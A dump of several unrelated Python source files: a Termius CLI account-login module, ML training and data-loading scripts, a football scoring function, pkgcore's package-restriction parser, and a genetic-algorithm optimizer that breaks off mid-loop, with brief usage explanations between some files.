"""Module to keep login and logout command."""
from contextlib import contextmanager
import six
from ..core.commands import AbstractCommand
from ..core.signals import post_logout
from ..core.commands.arg_types import boolean_yes_no
from ..core.exceptions import OptionNotSetException
from ..core.api import AuthyTokenIssue
from .managers import AccountManager
# pylint: disable=abstract-method
class BaseAccountCommand(AbstractCommand):
"""Base class for login and logout commands."""
def __init__(self, app, app_args, cmd_name=None):
"""Construct new instance."""
super(BaseAccountCommand, self).__init__(app, app_args, cmd_name)
self.manager = AccountManager(self.config)
class LoginCommand(BaseAccountCommand):
"""sign into the Termius Cloud"""
# pylint: disable=no-self-use
def prompt_username(self):
"""Ask username prompt."""
return six.moves.input('Username: ')
# pylint: disable=no-self-use
def prompt_authy_token(self):
"""Ask authy token prompt."""
return six.moves.input('Authy token: ')
def extend_parser(self, parser):
"""Add more arguments to parser."""
parser.add_argument('-u', '--username', metavar='USERNAME')
parser.add_argument('-p', '--password', metavar='PASSWORD')
return parser
def take_action(self, parsed_args):
"""Process CLI call."""
username = parsed_args.username or self.prompt_username()
password = parsed_args.password or self.prompt_password()
with on_clean_when_logout(self, self.manager):
try:
self.manager.login(username, password)
except AuthyTokenIssue:
authy_token = self.prompt_authy_token()
self.manager.login(username, password, authy_token=authy_token)
self.log.info('\nSigned in successfully')
class LogoutCommand(BaseAccountCommand):
"""sign out of the Termius Cloud"""
def take_action(self, _):
"""Process CLI call."""
with on_clean_when_logout(self, self.manager):
self.manager.logout()
self.log.info('Signed out')
class SettingsCommand(BaseAccountCommand):
"""update the account settings"""
def extend_parser(self, parser):
"""Add more arguments to parser."""
parser.add_argument(
'--synchronize-key', action='store', type=boolean_yes_no,
choices=(False, True), default=True,
help='enable/disable ssh keys and identities sync'
)
parser.add_argument(
'--agent-forwarding', action='store', type=boolean_yes_no,
choices=(False, True), default=True,
help='enable/disable agent forwarding'
)
return parser
def take_action(self, args):
"""Process CLI call."""
settings = {
k: getattr(args, k)
for k in ('synchronize_key', 'agent_forwarding')
}
self.manager.set_settings(settings)
self.log.info('Settings updated')
@contextmanager
def on_clean_when_logout(command, manager):
"""Monitor is account changed and call data clean."""
try:
old_username = manager.username
except OptionNotSetException:
old_username = None
yield
try:
new_username = manager.username
except OptionNotSetException:
new_username = None
is_username_changed = (
old_username and old_username != new_username
)
if is_username_changed:
        post_logout.send(command, command=command, email=old_username) | termius/account/commands.py
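The on_clean_when_logout helper above is a small before/after change detector built with contextlib. Below is a minimal standalone sketch of the same pattern, not part of termius; the names here are invented for illustration: capture a value before the wrapped block runs, compare it afterwards, and invoke a callback only when it changed.

from contextlib import contextmanager

@contextmanager
def on_change(get_value, callback):
    # Remember the value before the block runs.
    old = get_value()
    yield
    # After the block, fire the callback only if the value actually changed.
    if old is not None and old != get_value():
        callback(old)

# Example: report when an account name changes inside the block.
account = {'username': 'alice'}
with on_change(lambda: account.get('username'), lambda old: print('cleanup for', old)):
    account['username'] = 'bob'   # prints: cleanup for alice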
from typing import List
from src.models.inference.base_prediction import BasePrediction
from src.models.inference.representation import BoundingBox
from src.models.storage.batch import Batch
from src.models.storage.frame import Frame
class Prediction(BasePrediction):
"""
Data model used to store the predicted values of the model
Arguments:
frame (Frame): Frame in which the predictions are made
"""
def __init__(self, frame: Frame,
labels: List[str],
scores: List[float],
boxes: List[BoundingBox] = None):
self._boxes = boxes
self._labels = labels
self._frame = frame
self._scores = scores
@property
def boxes(self):
return self._boxes
@property
def labels(self):
return self._labels
@property
def frame(self):
return self._frame
@property
def scores(self):
return self._scores
@staticmethod
def predictions_from_batch_and_lists(batch: Batch,
predictions: List[List[str]],
scores: List[List[float]],
boxes: List[
List[BoundingBox]] = None):
"""
Factory method for returning a list of Prediction objects
from identified values
Arguments:
batch (Batch): frame batch for which the predictions belong to
predictions (List[List[str]]): List of prediction labels per
frame in batch
scores (List[List[float]]): List of prediction scores per frame
in batch
boxes (List[List[BoundingBox]]): List of bounding boxes
associated with predictions
Returns:
List[Prediction]
"""
assert len(batch.frames) == len(predictions)
assert len(batch.frames) == len(scores)
if boxes is not None:
assert len(batch.frames) == len(boxes)
predictions_ = []
for i in range(len(batch.frames)):
prediction_boxes = boxes[i] if boxes is not None else None
predictions_.append(
Prediction(batch.frames[i], predictions[i], scores[i],
boxes=prediction_boxes))
return predictions_
def __eq__(self, other):
if isinstance(self, type(other)):
return self.boxes == other.boxes and \
self.frame == other.frame and \
self.scores == other.scores and \
self.labels == other.labels
return other in self
def __contains__(self, item):
        return item in self.labels | src/models/inference/classifier_prediction.py
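A quick, hypothetical use of the factory method documented above. Constructing the Batch and Frame objects is omitted; `batch` is simply assumed to wrap two frames, so treat this as a sketch rather than runnable test code.

labels = [['car', 'person'], ['dog']]          # one label list per frame
scores = [[0.91, 0.75], [0.66]]                # matching confidence scores
preds = Prediction.predictions_from_batch_and_lists(batch, labels, scores)
assert len(preds) == 2
assert 'dog' in preds[1]                       # __contains__ checks the label list
assert preds[0].scores == [0.91, 0.75]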
from tensorflow import keras
import tensorflow as tf
import archs
from utils import data_utils, train_utils, augment, argmanager
from utils.loss import multinomial_nll
import numpy as np
import random
import string
import math
import os
import json
def subsample_nonpeak_data(nonpeak_seqs, nonpeak_cts, peak_data_size, negative_sampling_ratio):
#Randomly samples a portion of the non-peak data to use in training
num_nonpeak_samples = int(negative_sampling_ratio * peak_data_size)
nonpeak_indices_to_keep = np.random.choice(len(nonpeak_seqs), size=num_nonpeak_samples, replace=False)
nonpeak_seqs = nonpeak_seqs[nonpeak_indices_to_keep]
nonpeak_cts = nonpeak_cts[nonpeak_indices_to_keep]
return nonpeak_seqs, nonpeak_cts
class BatchGenerator(keras.utils.Sequence):
"""
This generator randomly crops (=jitter) and revcomps training examples for
every epoch
"""
def __init__(self, peak_seqs, nonpeak_seqs, peak_cts, nonpeak_cts, negative_sampling, negative_sampling_ratio, inputlen, outputlen, batch_size):
"""
seqs: B x L' x 4
cts: B x M'
inputlen: int (L <= L'), L' is greater to allow for cropping (= jittering)
outputlen: int (M <= M'), M' is greater to allow for cropping (= jittering)
batch_size: int (B)
"""
self.peak_seqs, self.nonpeak_seqs = peak_seqs, nonpeak_seqs
self.peak_cts, self.nonpeak_cts = peak_cts, nonpeak_cts
self.negative_sampling = negative_sampling
self.negative_sampling_ratio = negative_sampling_ratio
self.inputlen = inputlen
self.outputlen = outputlen
self.batch_size = batch_size
# random crop training data to the desired sizes, revcomp augmentation
self.crop_revcomp_data()
def __len__(self):
return math.ceil(self.seqs.shape[0]/self.batch_size)
def crop_revcomp_data(self):
# random crop training data to inputlen and outputlen (with corresponding offsets), revcomp augmentation
# shuffle required since otherwise peaks and nonpeaks will be together
#Sample a fraction of the negative samples according to the specified ratio
if self.negative_sampling:
self.sampled_nonpeak_seqs, self.sampled_nonpeak_cts = subsample_nonpeak_data(self.nonpeak_seqs, self.nonpeak_cts, len(self.peak_seqs), self.negative_sampling_ratio)
self.seqs = np.vstack([self.peak_seqs, self.sampled_nonpeak_seqs])
self.cts = np.vstack([self.peak_cts, self.sampled_nonpeak_cts])
else:
self.seqs = np.vstack([self.peak_seqs, self.nonpeak_seqs])
self.cts = np.vstack([self.peak_cts, self.nonpeak_cts])
self.cur_seqs, self.cur_cts = augment.crop_revcomp_augment(
self.seqs, self.cts, self.inputlen, self.outputlen,
shuffle=True
)
def __getitem__(self, idx):
batch_seq = self.cur_seqs[idx*self.batch_size:(idx+1)*self.batch_size]
batch_cts = self.cur_cts[idx*self.batch_size:(idx+1)*self.batch_size]
return batch_seq, [batch_cts, np.log(1+batch_cts.sum(-1, keepdims=True))]
def on_epoch_end(self):
self.crop_revcomp_data()
def train_loop(model, inputlen, outputlen, train_peak_seqs, train_nonpeak_seqs, train_peak_cts, train_nonpeak_cts,
val_peak_seqs, val_nonpeak_seqs, val_peak_cts, val_nonpeak_cts, negative_sampling, negative_sampling_ratio, batch_size, epochs, early_stop, output_prefix):
if negative_sampling:
np.random.seed(1248)
val_nonpeak_seqs, val_nonpeak_cts = subsample_nonpeak_data(val_nonpeak_seqs, val_nonpeak_cts, len(val_peak_seqs), negative_sampling_ratio)
val_seqs = np.vstack([val_peak_seqs, val_nonpeak_seqs])
val_cts = np.vstack([val_peak_cts, val_nonpeak_cts])
# need generator to crop and revcomp aug training examples, but not for
# validation.
train_generator = BatchGenerator(train_peak_seqs, train_nonpeak_seqs,
train_peak_cts, train_nonpeak_cts, negative_sampling, negative_sampling_ratio, inputlen, outputlen, batch_size)
callbacks = train_utils.get_callbacks(early_stop, output_prefix)
history = model.fit(train_generator,
epochs=epochs,
validation_data=(val_seqs,
[val_cts,
np.log(1+val_cts.sum(-1, keepdims=True))]),
callbacks=callbacks)
return history
def main():
args = argmanager.fetch_train_args()
print(args)
if os.path.exists("{}.h5".format(args.output_prefix)):
raise OSError('File {}.h5 already exists'.format(args.output_prefix))
# load data
train_peaks_seqs, train_peaks_cts, train_nonpeaks_seqs, train_nonpeaks_cts,\
val_peaks_seqs, val_peaks_cts, val_nonpeaks_seqs, val_nonpeaks_cts = \
data_utils.load_train_val_data(
args.peaks, args.nonpeaks, args.genome, args.bigwig,
args.val_chr, args.test_chr, args.inputlen, args.outputlen, args.max_jitter,
outlier=0.9999
)
# compute loss weight factor for counts loss
counts_loss_weight = train_utils.get_counts_stat(train_peaks_cts,
args.outputlen) * args.counts_weight
print("\nCounts loss weight : {:.2f}\n".format(counts_loss_weight))
# prepare model
model = archs.bpnet_seq(args.inputlen, args.outputlen, args.filters, args.ndil)
opt = keras.optimizers.Adam(learning_rate=args.learning_rate)
model.compile(
optimizer=opt,
loss=[multinomial_nll, 'mse'],
loss_weights = [1, counts_loss_weight]
)
history = train_loop(model, args.inputlen, args.outputlen,
train_peaks_seqs, train_nonpeaks_seqs,
train_peaks_cts, train_nonpeaks_cts,
val_peaks_seqs, val_nonpeaks_seqs,
val_peaks_cts, val_nonpeaks_cts, args.negative_sampling, args.negative_sampling_ratio,
args.batch_size, args.epochs,
args.early_stop, args.output_prefix)
with open("{}.history.json".format(args.output_prefix), "w") as f:
json.dump(history.history, f, ensure_ascii=False, indent=4)
if __name__=="__main__":
    main() | src/train.py
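As a small illustration of the data flow above (sizes and values here are made up): BatchGenerator.__getitem__ pairs each sequence batch with two targets, the per-base count profile and log(1 + total counts), which line up with the [multinomial_nll, 'mse'] losses compiled in main().

import numpy as np

B, outputlen = 64, 1000                                        # illustrative sizes
batch_cts = np.random.poisson(2.0, (B, outputlen)).astype(float)
profile_target = batch_cts                                     # head 0: multinomial NLL over the profile
count_target = np.log(1 + batch_cts.sum(-1, keepdims=True))    # head 1: MSE on log total counts, shape (B, 1)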
def tournament_scores(lst):
    # Points, goals scored and goals conceded for the four teams A-D.
    points = {team: 0 for team in 'ABCD'}
    goals = {team: 0 for team in 'ABCD'}
    conceded = {team: 0 for team in 'ABCD'}
    for match in lst:
        # Each result looks like "A 2 - 1 B": home team, home goals, '-', away goals, away team.
        home, home_goals, _, away_goals, away = match.split()
        home_goals, away_goals = int(home_goals), int(away_goals)
        goals[home] += home_goals
        conceded[home] += away_goals
        goals[away] += away_goals
        conceded[away] += home_goals
        if home_goals > away_goals:
            points[home] += 3        # home win
        elif home_goals < away_goals:
            points[away] += 3        # away win
        else:
            points[home] += 1        # draw: one point each
            points[away] += 1
    result = [[team, points[team], goals[team], goals[team] - conceded[team]]
              for team in 'ABCD']
    # Rank by points, then goals scored, then goal difference (all descending).
    sorted_result = sorted(result, key=lambda row: (row[1], row[2], row[3]), reverse=True)
    print(sorted_result)
    return sorted_result | Data Science and Machine Learning/Machine-Learning-In-Python-THOROUGH/EXAMPLES/EDABIT/EXPERT/001_100/07_football_tournement_scores.py
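A short usage example for the function above; the match-string format ("TEAM goals - goals TEAM") is inferred from the indexing in the original code.

matches = ["A 2 - 1 B", "C 1 - 1 D"]
tournament_scores(matches)
# -> [['A', 3, 2, 1], ['C', 1, 1, 0], ['D', 1, 1, 0], ['B', 0, 1, -1]]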
import re
from ..ebuild import atom, cpv, errors, restricts
from ..restrictions import packages, values
from ..restrictions.util import collect_package_restrictions
valid_globbing = re.compile(r"^(?:[\w+-.]+|(?<!\*)\*)+$").match
class ParseError(ValueError):
"""Raised if parsing a restriction expression failed."""
def comma_separated_containment(attr, values_kls=frozenset, token_kls=str):
"""Helper for parsing comma-separated strings to a ContainmentMatch2.
:param attr: name of the attribute.
:return: a parse function: takes a string of comma-separated values,
returns a :obj:`packages.PackageRestriction` matching packages that
have any of those values in the attribute passed to this function.
"""
def _parse(value):
return packages.PackageRestriction(
attr, values.ContainmentMatch2(
values_kls(token_kls(piece.strip()) for piece in value.split(','))
)
)
return _parse
def convert_glob(token):
if token in ('*', ''):
return None
elif '*' not in token:
return values.StrExactMatch(token)
elif not valid_globbing(token):
raise ParseError(
"globs must be composed of [\\w-.+], with optional "
f"'*'- {token!r} is disallowed however")
pattern = re.escape(token).replace('\\*', '.*')
pattern = f"^{pattern}$"
return values.StrRegex(pattern, match=True)
def collect_ops(text):
i = 0
while i < len(text) and text[i] in ("<", "=", ">", "~"):
i += 1
return text[0:i], text[i:]
def parse_match(text):
"""generate appropriate restriction for text
Parsing basically breaks it down into chunks split by /, with each
chunk allowing for prefix/postfix globbing- note that a postfixed
glob on package token is treated as package attribute matching,
not as necessarily a version match.
If only one chunk is found, it's treated as a package chunk.
Finally, it supports a nonstandard variation of atom syntax where
the category can be dropped.
Examples:
- `*`: match all
- `dev-*/*`: category must start with 'dev-'
- `dev-*`: package must start with 'dev-'
- `*-apps/portage*`: category must end in '-apps', package must start with
'portage'
- `>=portage-2.1`: atom syntax, package 'portage', version greater than or
equal to '2.1'
- dev-qt/*:5: all Qt 5 libs
- boost:0/1.60: all packages named boost with a slot/subslot of 0/1.60.0
:param text: string to attempt to parse
:type text: string
:return: :obj:`pkgcore.restrictions.packages` derivative
"""
orig_text = text = text.strip()
if "!" in text:
raise ParseError(
f"'!' or any form of blockers make no sense in this usage: {text!r}")
restrictions = []
if '::' in text:
text, repo_id = text.rsplit('::', 1)
restrictions.append(restricts.RepositoryDep(repo_id))
if ':' in text:
text, slot = text.rsplit(':', 1)
slot, _sep, subslot = slot.partition('/')
if slot:
if '*' in slot:
if r := convert_glob(slot):
restrictions.append(packages.PackageRestriction("slot", r))
else:
restrictions.append(restricts.SlotDep(slot))
if subslot:
if '*' in subslot:
if r := convert_glob(subslot):
restrictions.append(packages.PackageRestriction("subslot", r))
else:
restrictions.append(restricts.SubSlotDep(subslot))
tsplit = text.rsplit("/", 1)
if len(tsplit) == 1:
ops, text = collect_ops(text)
if not ops:
if "*" in text:
if r := convert_glob(text):
restrictions.append(packages.PackageRestriction("package", r))
else:
restrictions.append(packages.AlwaysTrue)
if len(restrictions) == 1:
return restrictions[0]
return packages.AndRestriction(*restrictions)
elif text.startswith("*"):
raise ParseError(
f"cannot do prefix glob matches with version ops: {orig_text}")
# ok... fake category. whee.
try:
r = list(collect_package_restrictions(
atom.atom(f"{ops}category/{text}").restrictions,
attrs=("category",), invert=True))
except errors.MalformedAtom as e:
e.atom = orig_text
raise ParseError(str(e)) from e
if not restrictions and len(r) == 1:
return r[0]
restrictions.extend(r)
return packages.AndRestriction(*restrictions)
elif text[0] in atom.valid_ops or '*' not in text:
# possibly a valid atom object
try:
return atom.atom(orig_text)
except errors.MalformedAtom as e:
if '*' not in text:
raise ParseError(str(e)) from e
# support globbed targets with version restrictions
return packages.AndRestriction(*parse_globbed_version(text, orig_text))
r = list(map(convert_glob, tsplit))
if not r[0] and not r[1]:
restrictions.append(packages.AlwaysTrue)
elif not r[0]:
restrictions.append(packages.PackageRestriction("package", r[1]))
elif not r[1]:
restrictions.append(packages.PackageRestriction("category", r[0]))
else:
restrictions.extend((
packages.PackageRestriction("category", r[0]),
packages.PackageRestriction("package", r[1]),
))
if len(restrictions) == 1:
return restrictions[0]
return packages.AndRestriction(*restrictions)
def parse_globbed_version(text, orig_text):
"""Support parsing globbed targets with limited version restrictions.
For example, '>=*/alsa-*-1.1.7' would match all packages named 'alsa-*'
that are version 1.1.7 or greater.
"""
restrictions = []
# find longest matching op
op = max(x for x in atom.valid_ops if text.startswith(x))
text = text[len(op):]
# determine pkg version
chunks = text.rsplit('-', 1)
if len(chunks) == 1:
raise ParseError(f'missing valid package version: {orig_text!r}')
version_txt = chunks[-1]
version = cpv.isvalid_version_re.match(version_txt)
if not version:
if '*' in version_txt:
raise ParseError(
f'operator {op!r} invalid with globbed version: {version_txt!r}')
raise ParseError(f'missing valid package version: {orig_text!r}')
restrictions.append(restricts.VersionMatch(op, version.group(0)))
# parse the remaining chunk
restrictions.append(parse_match(chunks[0]))
return restrictions
def parse_pv(repo, text):
"""Return a CPV instance from either a cpv or a pv string.
If a pv is passed it needs to match a single cpv in repo.
"""
try:
return cpv.CPV.versioned(text)
except errors.InvalidCPV:
restrict = parse_match(f"={text}")
result = None
for match in repo.itermatch(restrict):
if result is not None:
raise ParseError(
f"multiple matches for {text} ({result.cpvstr}, {match.cpvstr})")
result = match
if result is None:
raise ParseError(f"no matches for {text}")
return cpv.CPV(result.category, result.package, result.version)
parse_funcs = {
'match': parse_match,
} | src/pkgcore/util/parserestrict.py
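A few hypothetical calls mirroring the patterns listed in the parse_match docstring; each returns a pkgcore restriction object that can be handed to a repository query (parse_pv above uses repo.itermatch for exactly that).

r1 = parse_match("dev-*/*")         # category must start with 'dev-'
r2 = parse_match(">=portage-2.1")   # plain atom with a version bound
r3 = parse_match("boost:0/1.60")    # slot/subslot restriction
# matches = list(repo.itermatch(r1))   # 'repo' would be a configured repository object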
import torch
def videoset_train_collate(batch):
videos, vmasks, labels = [], [], []
for item, label in batch:
videos.append(item[0])
vmasks.append(item[1])
labels.append(label)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(labels, dim=0))
def videoset_emb_collate(batch):
video_batch, mask_batch, vid_batch = [], [], []
for video, mask, vid in batch:
video_batch.append(video)
mask_batch.append(mask)
vid_batch.append(vid)
return (torch.cat(video_batch, dim=0), torch.cat(mask_batch, dim=0),
vid_batch)
def vaset_train_collate(batch):
videos, vmasks, audios, amasks, labels = [], [], [], [], []
for item, label in batch:
videos.append(item[0])
vmasks.append(item[1])
audios.append(item[2])
amasks.append(item[3])
labels.append(label)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(audios, dim=0), torch.cat(amasks, dim=0),
torch.cat(labels, dim=0))
def vaset_emb_collate(batch):
videos, vmasks, audios, amasks, vid_batch = [], [], [], [], []
for video, vmask, audio, amask, vid in batch:
videos.append(video)
vmasks.append(vmask)
audios.append(audio)
amasks.append(amask)
vid_batch.append(vid)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(audios, dim=0), torch.cat(amasks, dim=0),
vid_batch)
def vtset_train_collate(batch):
videos, vmasks, texts, tmasks, labels = [], [], [], [], []
for item in batch:
videos.append(item[0])
vmasks.append(item[1])
texts.append(item[2])
tmasks.append(item[3])
labels.append(item[4])
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(texts, dim=0), torch.cat(tmasks, dim=0),
torch.cat(labels, dim=0))
def vtset_emb_collate(batch):
videos, vmasks, texts, tmasks, vid_batch = [], [], [], [], []
for video, vmask, text, tmask, vid in batch:
videos.append(video)
vmasks.append(vmask)
texts.append(text)
tmasks.append(tmask)
vid_batch.append(vid)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(texts, dim=0), torch.cat(tmasks, dim=0),
            vid_batch) | dataloader/collate.py
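A minimal sketch of how one of these collate functions is typically wired into a PyTorch DataLoader; the ToyVideoSet dataset and its tensor shapes are invented purely for illustration.

from torch.utils.data import DataLoader, Dataset

class ToyVideoSet(Dataset):
    """Yields ((video, vmask), label) items shaped the way videoset_train_collate expects."""
    def __len__(self):
        return 8
    def __getitem__(self, idx):
        video = torch.zeros(1, 16, 2048)      # 1 x num_frames x feature_dim (illustrative)
        vmask = torch.ones(1, 16)
        label = torch.tensor([idx % 2])
        return (video, vmask), label

loader = DataLoader(ToyVideoSet(), batch_size=4, collate_fn=videoset_train_collate)
videos, vmasks, labels = next(iter(loader))   # shapes: (4, 16, 2048), (4, 16), (4,)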
import sys
sys.path.insert(0, "../../Sknet/")
import sknet
import os
import numpy as np
import time
import tensorflow as tf
from sknet import ops,layers
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_augmentation', type=int)
parser.add_argument('--dataset', type=str)
parser.add_argument('--model', type=str)
parser.add_argument('--epsilon', type=float)
parser.add_argument('-n', type=int)
parser.add_argument('--gamma', type=float)
parser.add_argument('--lr', type=float)
args = parser.parse_args()
DATA_AUGMENTATION = args.data_augmentation
EPSILON = args.epsilon
DATASET = args.dataset
MODEL = args.model
GAMMA = args.gamma
N = args.n
LR = args.lr
# Data Loading
#-------------
if DATASET=='cifar10':
dataset = sknet.datasets.load_cifar10()
elif DATASET=='mnist':
dataset = sknet.datasets.load_mnist()
elif DATASET=='svhn':
dataset = sknet.datasets.load_svhn()
elif DATASET=='cifar100':
dataset = sknet.datasets.load_cifar100()
dataset['indicator/train_set'] = np.concatenate([np.ones(len(dataset['images/train_set'])),
np.zeros(len(dataset['images/test_set']))])
dataset['indicator/test_set'] = np.zeros(4000)
dataset['images/train_set'] = np.concatenate([dataset['images/train_set'],
dataset['images/test_set']],0)
dataset['labels/train_set'] = np.concatenate([dataset['labels/train_set'],
dataset['labels/test_set']],0)
if "valid_set" not in dataset.sets:
dataset.split_set("train_set","valid_set",0.15)
preprocess = sknet.datasets.Standardize().fit(dataset['images/train_set'])
dataset['images/train_set'] = preprocess.transform(dataset['images/train_set'])
dataset['images/test_set'] = preprocess.transform(dataset['images/test_set'])
dataset['images/valid_set'] = preprocess.transform(dataset['images/valid_set'])
options = {'train_set': "random_see_all",
'valid_set': 'continuous',
'test_set': 'continuous'}
dataset.create_placeholders(32, options, device="/cpu:0")
const = (2*EPSILON)**(1./2)
# Create Network
#---------------
dnn = sknet.Network()
if DATA_AUGMENTATION:
start = 2
dnn.append(sknet.ops.RandomAxisReverse(dataset.images, axis=[-1]))
if DATASET == 'fashion':
dnn.append(sknet.ops.RandomCrop(dnn[-1], (28, 28), pad=(6, 6), seed=10))
elif DATASET in ['cifar10', 'cifar100', 'svhn']:
dnn.append(sknet.ops.RandomCrop(dnn[-1], (32, 32), pad=(8, 8), seed=10))
else:
dnn.append(dataset.images)
start = 1
noise = tf.nn.l2_normalize(tf.random_normal(dnn[-1].get_shape().as_list()),
(1, 2, 3))*EPSILON
dnn.append(ops.Concat([dnn[-1],dnn[-1]+noise],axis=0))
if MODEL == 'cnn':
sknet.networks.ConvLarge(dnn, noise=NOISE)
elif MODEL == 'simpleresnet':
sknet.networks.Resnet(dnn, D=4, W=1, block=sknet.layers.ResBlockV2)
elif MODEL == 'resnet':
sknet.networks.Resnet(dnn, D=10, W=1, block=sknet.layers.ResBlockV2)
elif MODEL == 'wideresnet':
sknet.networks.Resnet(dnn, D=6, W=2, block=sknet.layers.ResBlockV2)
dnn.append(sknet.ops.Dense(dnn[-1], dataset.n_classes))
# accuracy and loss
vvv = tf.reshape(tf.cast(dataset.indicator, tf.float32), (-1, 1, 1, 1))
def compute_row(i):
onehot = tf.ones((64 ,1))*tf.expand_dims(tf.one_hot(i, dataset.n_classes), 0)
grad = tf.gradients(dnn[-1], dnn[start], onehot)[0]
return tf.reduce_mean(tf.sqrt(tf.reduce_sum((1-vvv)*tf.square((grad[:32]-grad[32:])/EPSILON),
[1, 2, 3])+0.0001))
prediction = dnn[-1]
hessian = tf.sqrt(tf.reduce_sum(tf.map_fn(compute_row, tf.range(dataset.n_classes),
dtype=tf.float32))+0.0001)
accu = sknet.losses.streaming_mean(sknet.losses.accuracy(dataset.labels,
dnn[-1][:32]))
vvv = tf.cast(tf.reshape(dataset.indicator, (-1, 1)), tf.float32)
loss = sknet.losses.crossentropy_logits(dataset.labels, vvv*dnn[-1][:32]) +\
GAMMA*hessian
# optimizer and updates
B = dataset.N_BATCH('train_set')
lr = sknet.schedules.PiecewiseConstant(LR, {70*B: LR/3, 120*B: LR/9})
optimizer = sknet.optimizers.Adam(loss, dnn.variables(trainable=True), lr)
minimizer = tf.group(*optimizer.updates, *dnn.updates)
reset = tf.group(optimizer.reset_variables_op, dnn.reset_variables_op)
# Workers
train = sknet.Worker(minimizer, loss=loss, accu=accu, hessian=hessian,
context='train_set', to_print=loss,
feed_dict=dnn.deter_dict(False))
test = sknet.Worker(loss=loss, accu=accu, hessian=hessian,
context='test_set', to_print=accu,
feed_dict=dnn.deter_dict(True))
valid = sknet.Worker(loss=loss, accu=accu, hessian=hessian,
context='valid_set', to_print=accu,
feed_dict=dnn.deter_dict(True))
# Pipeline
workplace = sknet.utils.Workplace(dataset=dataset)
path = '/mnt/drive1/rbalSpace/Hessian/acttest_{}_{}_{}_{}_{}_{}_{}_{}.h5'
#path = '/mnt/project2/rb42Data/BatchNorm/pretrain_{}_{}_{}_{}_{}.h5'
for run in range(5):
workplace.init_file(path.format(MODEL, DATASET, EPSILON,
DATA_AUGMENTATION, N, GAMMA, LR, run))
workplace.execute_worker((train, valid, test), repeat=150)
workplace.session.run(reset)
    dnn = sknet.Network() | REGUL/run_test.py
from datetime import datetime
from datetime import timedelta
import pytz
import time
import numpy as np
import json
import pandas as pd
from fitness_all import fitnessOfPath
import random
from scipy.stats import truncnorm
from matplotlib import pyplot as plt
def evaluate_fitness_of_all(generation,sessions,travel_time,daysotw,timezones,dictionary):
m = np.size(generation,1)
total_time = []
for i in range(m):
gen_time = 0
path = generation.astype(int)
path = path[:,i]
listpath = str(path.tolist())
if listpath in dictionary:
fitness_path = dictionary[listpath]
else:
fitness_path = fitnessOfPath(path,sessions,travel_time,daysotw,timezones)
dictionary[listpath] = fitness_path
total_time.append(fitness_path)
return total_time
def runExperiment(cross_percent_ordered,cross_percent_swap,mutat_percent,num_gen,gen_size,tourneykeep,dictionary,sessions,travel_time,daysotw,timezones,all_history,all_fitness,all_times,xopts,fopts,all_iterations):
start = time.time()
tourny_size = 2
num_temples = len(timezones)
old_gen = np.zeros((num_temples,gen_size))
parents = np.zeros((2,))
children = np.zeros((num_temples,2))
for i in range(gen_size):
col = np.random.permutation(num_temples)
old_gen[:,i] = np.transpose(col)
initial_gen = old_gen
initial_fit = evaluate_fitness_of_all(old_gen, sessions, travel_time, daysotw, timezones, dictionary)
prev_fit = np.array(initial_fit)
# Generation For Loop
fitness_history = []
best_history = []
prev_fit_one_behind = 20000000000000000
end_timer = 0
for gen in range(num_gen):
# Child Generation For loop
old_fit = prev_fit.tolist()
# Do a tournament
new_gen = np.zeros((num_temples,gen_size*2))
for i in range(int(gen_size)):
# Two tournaments for the two parents
for j in range(2):
# Select Parents (By fitness) (Tournament Style)
tourny_participants = random.sample(list(range(gen_size)), tourny_size)
arg = np.argmin(np.array(old_fit)[tourny_participants])
if(np.random.rand(1)>tourneykeep):
del tourny_participants[arg]
parents[j] = np.copy(tourny_participants[0])
else:
parents[j]= np.copy(tourny_participants[arg])
children[:,0] = np.copy(old_gen[:,np.copy(int(parents[0]))])
children[:,1] = np.copy(old_gen[:,np.copy(int(parents[1]))])
if end_timer > 200:
if np.array_equal(children[:,0],children[:,1]):
children[:,1] = np.random.permutation(num_temples)
#Crossover (Uniform) (With chromosome repair)
for j in range(num_temples): #Iterate through the genes of the children.
# TODO preallocate random numbers in the beginning
if np.random.rand(1) < cross_percent_swap:
#Store the genes
temp1 = np.copy(children[j][0]) #Temporarily store child one's gene
temp2 = np.copy(children[j][1])
#Child one gene swap and chromosome repair
gene_loc_1 = np.argwhere(children[:,0]==temp2).flatten()[0] #Find the location of the gene to be swapped
gene_loc_2 = np.argwhere(children[:,1]==temp1).flatten()[0]
children[gene_loc_1][0] = np.copy(temp1)
children[j][0] = np.copy(temp2)
children[gene_loc_2][1] = np.copy(temp2)
children[j][1] = np.copy(temp1)
#Ordered Crossover
crossover_values = []
for j in range(num_temples): #Iterate through the genes of the children.
if np.random.rand(1) < cross_percent_ordered:
crossover_values.append(j)
# array of the order of the values of the first parent
if len(crossover_values) != 0:
child1 = children[:,0]
child2 = children[:,1]
indices1 = np.sort([np.where(child1==cv)[0][0] for cv in crossover_values])
indices2 = np.sort([np.where(child2==cv)[0][0] for cv in crossover_values])
temp1 = np.copy(child1)
temp2 = np.copy(child2)
child1[indices1] = np.copy(temp2[indices2])
child2[indices2] = np.copy(temp1[indices1])
#Mutation (Uniform)
for chil in range(2):
for j in range(num_temples): #Iterate through the genes of the children.
if np.random.rand(1) < mutat_percent:
# Child gene insertion
mutated_value = np.random.randint(0,num_temples)
if mutated_value == children[j,chil]:
continue
gene_loc_mutate = np.argwhere(children[:,chil]==mutated_value).flatten()[0]
child = children[:,chil]
updated_child = np.insert(child,j,mutated_value)
if j > gene_loc_mutate:
child = np.delete(updated_child,gene_loc_mutate)
else:
child = np.delete(updated_child,gene_loc_mutate+1)
children[:,chil] = np.copy(child)
#Store Children into new generation
new_gen[:,2*(i+1)-2] = np.copy(children[:,0])
new_gen[:,2*(i+1)-1] = np.copy(children[:,1])
#Elitism (Pick top N)
        current_gen = np.concatenate((old_gen, new_gen), axis=1)  # Concatenate together for fitness function
new_fit = evaluate_fitness_of_all(new_gen, sessions, travel_time, daysotw, timezones, dictionary)
current_gen_fit = old_fit+new_fit
winners = np.array(current_gen_fit).argsort()[:gen_size]
old_gen = np.copy(current_gen[:,winners])
prev_fit = np.copy(np.array(current_gen_fit)[winners])
I = np.argmin(current_gen_fit)
fit_now = current_gen_fit[I]
fitness_history.append(fit_now)
best_history.append(current_gen[:,I].tolist())
print(gen)
# Check if the GA is in a local optimum for too long
if fit_now < prev_fit_one_behind:
prev_fit_one_behind = fit_now
